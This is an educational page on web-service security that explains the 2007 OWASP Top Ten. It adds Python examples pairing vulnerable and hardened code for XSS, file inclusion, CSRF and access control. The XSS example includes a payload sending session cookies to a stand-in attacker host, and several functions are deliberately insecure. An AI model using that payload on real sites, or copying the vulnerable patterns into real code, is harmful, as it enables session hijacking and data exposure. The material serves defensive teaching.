SOA vulnerabilities

Web services have largely the same vulnerabilities as other web applications. Since a service is often reachable over the internet, it needs the same protection an internet-facing application needs. But web services also have other systems communicating with them, machine to machine, so security has to be managed for those callers as well: the calling system must be authenticated and authorized, and its input validated, just as a browser user's would be.


The website owasp.org addresses security issues for web applications. It publishes tips and articles on a wide variety of security topics: how to protect against intrusion, tools and procedures for carrying out your own security reviews, and so on. It is a resource both for security experts and for ordinary users who are interested in security and recognise its importance. Among other things, OWASP publishes a list of the most common security risks in web applications, the OWASP Top Ten. The list below is the latest stable version at the time of writing (published 2007); the previous edition was from 2004.

  • Cross Site Scripting (XSS)
  • Injection Flaws
  • Malicious File Execution
  • Insecure Direct Object Reference
  • Cross Site Request Forgery (CSRF)
  • Information Leakage and Improper Error Handling
  • Broken Authentication and Session Management
  • Insecure Cryptographic Storage
  • Insecure Communications
  • Failure to Restrict URL Access


At the top we find cross-site scripting, also known as XSS, which is the most common vulnerability. The attacker gets script of their own choosing into a page that a visitor's browser renders, either reflected from a request parameter or stored in the application, because the application writes untrusted input into its HTML without encoding it. The script then runs in the victim's browser with the page's privileges, and the attacker can use it, for example, to read the session cookie, take over the session and act as that user.
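To make the mechanism concrete, here is an added example (not code from the original page): a reflected XSS sink of the kind described above, beside the same page rendered with HTML encoding. The page template, the function names and the payload are constructed for illustration; the payload does what the text says, it sends the victim's cookie to an attacker-controlled host.

```python
# Added example: a reflected XSS sink and its fix (constructed, not from the page).
from html import escape

# Constructed page template that echoes a request parameter into HTML text.
PAGE = "<html><body><p>Hello, {name}!</p></body></html>"


def render_greeting_vulnerable(name: str) -> str:
    """Writes the attacker-controlled value into the HTML verbatim, so the
    browser executes any <script> element it contains."""
    return PAGE.format(name=name)


def render_greeting_safe(name: str) -> str:
    """Encodes the value for an HTML text context: '<' becomes '&lt;', '"'
    becomes '&quot;', and the browser shows the payload as text."""
    return PAGE.format(name=escape(name, quote=True))


# Constructed payload of the kind the text describes: it ships the victim's
# session cookie to a host the attacker controls. Any browser that receives
# the vulnerable rendering will run it.
PAYLOAD = (
    '<script>new Image().src="http://attacker.example/?c="'
    '+document.cookie</script>'
)

if __name__ == "__main__":
    print("vulnerable:", render_greeting_vulnerable(PAYLOAD))
    print("safe:      ", render_greeting_safe(PAYLOAD))
```

Two caveats a practitioner would add: html.escape is the right encoder only for element text and quoted attribute values; a value written into a JavaScript string, a URL or a style block needs the encoder for that context. And marking the session cookie HttpOnly stops this particular payload from reading it, but does not stop the script from acting as the user while the page is open.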


Injection flaws, of which SQL injection is the most common, mean that attacker-supplied data is passed to an interpreter as part of a command or query, for example concatenated into an SQL statement sent to the database. If nothing prevents it, the interpreter executes the attacker's fragment as code: the database may, for instance, return every user in the table to the attacker instead of the single row the query was meant to fetch.

Malicious file execution means that the application uses file names or files supplied by the attacker directly, for example in an include or file-loading call, so that a file of the attacker's choosing is read or executed on the server. In the 2007 list this class (remote and local file inclusion) was especially associated with PHP applications, where an included file is executed as code.
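As an added example (not from the original page), here is a template loader that takes a name from the request. The vulnerable version hands the name to the filesystem as-is, so an absolute path or a "../" sequence leaves the template directory; the hardened version restricts the name to an allowlist of characters and then checks that the resolved path is still inside the directory. In a PHP-style include the loaded file would be executed rather than returned, which is the "execution" in the name. The directory layout, file names and function names are constructed.

```python
# Added example: file inclusion through a request parameter, and the fix.
# The directory layout and names are constructed for illustration.
import os
import re
import tempfile


def make_fixture():
    """Constructed layout: a template directory holding one legitimate
    template, and a secret file that lives outside that directory."""
    base = tempfile.mkdtemp()
    with open(os.path.join(base, "welcome.tpl"), "w") as f:
        f.write("Welcome page")
    secret = os.path.join(tempfile.mkdtemp(), "secret.txt")
    with open(secret, "w") as f:
        f.write("db_password=hunter2")
    return base, secret


def load_template_vulnerable(base: str, name: str) -> str:
    """Trusts the request value. os.path.join discards `base` when `name` is
    absolute, and "../" walks out of it, so any readable file is reachable."""
    with open(os.path.join(base, name)) as f:
        return f.read()


# Only plain identifiers are accepted as template names.
NAME_RE = re.compile(r"[A-Za-z0-9_]+")


def load_template_safe(base: str, name: str) -> str:
    """Allowlists the name, appends the extension itself, and verifies that
    the resolved path is a direct child of the template directory."""
    if not NAME_RE.fullmatch(name):
        raise ValueError("invalid template name")
    base_real = os.path.realpath(base)
    path = os.path.realpath(os.path.join(base_real, name + ".tpl"))
    if os.path.dirname(path) != base_real or not os.path.isfile(path):
        # One generic error for "outside base" and "does not exist", so the
        # caller learns nothing about the filesystem layout.
        raise ValueError("no such template")
    with open(path) as f:
        return f.read()


def is_rejected(base: str, name: str) -> bool:
    """True when the hardened loader refuses the name."""
    try:
        load_template_safe(base, name)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    base, secret = make_fixture()
    print("vulnerable, absolute path:", load_template_vulnerable(base, secret))
    print("safe, legitimate name:    ", load_template_safe(base, "welcome"))
    print("safe rejects traversal:   ", is_rejected(base, "../secret"))
```

The character allowlist is the primary control; the realpath containment check is defence in depth against symlinks and encoding tricks that an allowlist alone might not catch.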


Insecure direct object reference means that the application exposes a reference to an internal implementation object, such as a file, a directory, a database record or a key, in a URL or form parameter, and uses that reference without checking that the current user is allowed to access the object. An attacker who changes the reference, for example by incrementing an id in the URL, can reach other users' data or internal files, and can use whatever is disclosed to plan further attacks on the internal system.


Cross-site request forgery means that the attacker makes the browser of a victim who is already logged in to a website send a request the victim did not intend, for example by placing a hidden form or an image tag on a page the victim visits. Because the browser attaches the session cookie automatically, the site cannot tell the forged request from a genuine one unless it requires something the attacker's page cannot supply, such as a secret token tied to the session.
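The following added example (constructed for this page, not the page's own code) models a money-transfer handler. The vulnerable version accepts any request that carries the session cookie, which a forged cross-site form post does; the hardened version also demands a token derived from the session with a server-side secret, which the attacker's page cannot compute. The request objects, the server secret and the handler names are constructed; in a real deployment the secret comes from configuration, not from a fresh random value per process.

```python
# Added example: a CSRF-vulnerable handler and a token-protected one.
# Requests, secret and names are constructed for illustration.
import hashlib
import hmac
import secrets

# Constructed per-process secret; a real server loads this from configuration.
SERVER_SECRET = secrets.token_bytes(32)


def csrf_token(session_id: str) -> str:
    """Token bound to the session: HMAC(secret, session id). The attacker's
    page knows neither input, so it cannot forge the value."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def transfer_vulnerable(request: dict) -> str:
    """Decides on the session cookie alone. The victim's browser attaches
    that cookie to a forged cross-site POST too, so the forgery succeeds."""
    if "session" not in request["cookies"]:
        return "denied: not logged in"
    return f"transferred {request['form']['amount']} to {request['form']['to']}"


def transfer_safe(request: dict) -> str:
    """Additionally requires the session-bound token in the form body and
    compares it in constant time."""
    session = request["cookies"].get("session")
    if session is None:
        return "denied: not logged in"
    supplied = request["form"].get("csrf_token", "")
    expected = csrf_token(session)
    if not hmac.compare_digest(supplied.encode(), expected.encode()):
        return "denied: missing or invalid CSRF token"
    return f"transferred {request['form']['amount']} to {request['form']['to']}"


# Constructed requests. The browser sends the same session cookie with both;
# only the genuine one carries the token the site embedded in its own form.
GENUINE = {
    "cookies": {"session": "s3ss10n"},
    "form": {"to": "bob", "amount": "10", "csrf_token": csrf_token("s3ss10n")},
}
FORGED = {
    "cookies": {"session": "s3ss10n"},
    "form": {"to": "attacker", "amount": "1000"},
}

if __name__ == "__main__":
    print("vulnerable, forged:", transfer_vulnerable(FORGED))
    print("safe, forged:      ", transfer_safe(FORGED))
    print("safe, genuine:     ", transfer_safe(GENUINE))
```

The token check only helps if the token is not readable by the attacker's page, which is why XSS on the same site defeats it. Modern browsers add a second layer: a session cookie marked SameSite is not sent on most cross-site requests, which blocks the classic hidden-form forgery even without a token.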


Information leakage and improper error handling means that the application leaks information about, for example, its configuration or its connections to other systems. Examples are stack traces, or error messages that reveal why an SQL statement failed. An attacker uses that information to prepare other attacks; the user should get a generic error while the details go to the server log.


Broken authentication and session management means that flaws in how the application handles credentials, session tokens or cookies let an attacker obtain a valid session identifier, whether by stealing it, guessing it or fixing it in advance, and thereby "steal" the victim's identity.


Insecure cryptographic storage. By taking advantage of weak or missing protection of stored data, for example passwords kept in clear text or hashed with a fast, unsalted algorithm, or keys stored alongside the data they protect, the attacker can obtain the information that was supposed to be protected.


Insecure communications - transmitted data is not protected by encryption, so anyone on the network path, for example on a shared wireless network, can read or alter credentials, session cookies and the data itself. Authenticated traffic, and in particular the login itself, should be carried over TLS.


Failure to restrict URL access. Information is often protected only by hiding the links from users who are not authorized to see them. By requesting the URLs directly, the attacker can still reach the protected pages; the authorization check has to be made on the server for every request, not only when deciding which menu entries to render.
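Both this item and insecure direct object reference above come down to the same missing server-side check, so one added example (constructed for this page, not the page's own code) covers both: an invoice lookup keyed by an id from the URL, with and without an ownership check, and a request dispatcher that either trusts the hidden link or enforces a role per route. The users, roles, invoices, routes and function names are constructed.

```python
# Added example: direct object reference and URL access without, and with,
# a server-side authorization check. All data and names are constructed.

# Constructed users with roles, and invoices keyed by their owner.
USERS = {"alice": {"role": "user"}, "bob": {"role": "user"}, "carol": {"role": "admin"}}
INVOICES = {
    1001: {"owner": "alice", "total": 42.0},
    1002: {"owner": "bob", "total": 99.5},
}


class Forbidden(Exception):
    """Raised when the current user may not access the requested resource."""


def get_invoice_vulnerable(current_user: str, invoice_id: int) -> dict:
    """Looks the record up by the id from the URL (/invoice?id=1002) and never
    asks whose it is: alice can read bob's invoice by changing the number."""
    return INVOICES[invoice_id]


def get_invoice_safe(current_user: str, invoice_id: int) -> dict:
    """Checks ownership on every lookup. A missing id and someone else's id
    get the same answer, so the attacker cannot enumerate valid ids."""
    inv = INVOICES.get(invoice_id)
    if inv is None or inv["owner"] != current_user:
        raise Forbidden("invoice not found")
    return inv


# Constructed routes: which roles may request each path.
ROUTE_ROLES = {"/invoice": {"user", "admin"}, "/admin/users": {"admin"}}
HANDLERS = {"/invoice": "invoice list", "/admin/users": "user management"}


def dispatch_vulnerable(current_user: str, path: str) -> str:
    """Relies on the admin link being hidden from ordinary users; a typed-in
    URL reaches the handler anyway."""
    return HANDLERS[path]


def dispatch_safe(current_user: str, path: str) -> str:
    """Enforces the route's role requirement before running the handler."""
    allowed = ROUTE_ROLES.get(path)
    if allowed is None or USERS[current_user]["role"] not in allowed:
        raise Forbidden(path)
    return HANDLERS[path]


def is_denied(func, *args) -> bool:
    """True when the hardened function refuses the request."""
    try:
        func(*args)
    except Forbidden:
        return True
    return False


if __name__ == "__main__":
    print("alice reads bob's invoice (vulnerable):", get_invoice_vulnerable("alice", 1002))
    print("alice reads bob's invoice (safe, denied):", is_denied(get_invoice_safe, "alice", 1002))
    print("alice requests /admin/users (vulnerable):", dispatch_vulnerable("alice", "/admin/users"))
    print("alice requests /admin/users (safe, denied):", is_denied(dispatch_safe, "alice", "/admin/users"))
```

The check belongs in one place that every handler passes through, so that a new page cannot be added without it; a hidden link is a usability decision, not a security control.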

There is a special Top Ten list that focuses exclusively on Java.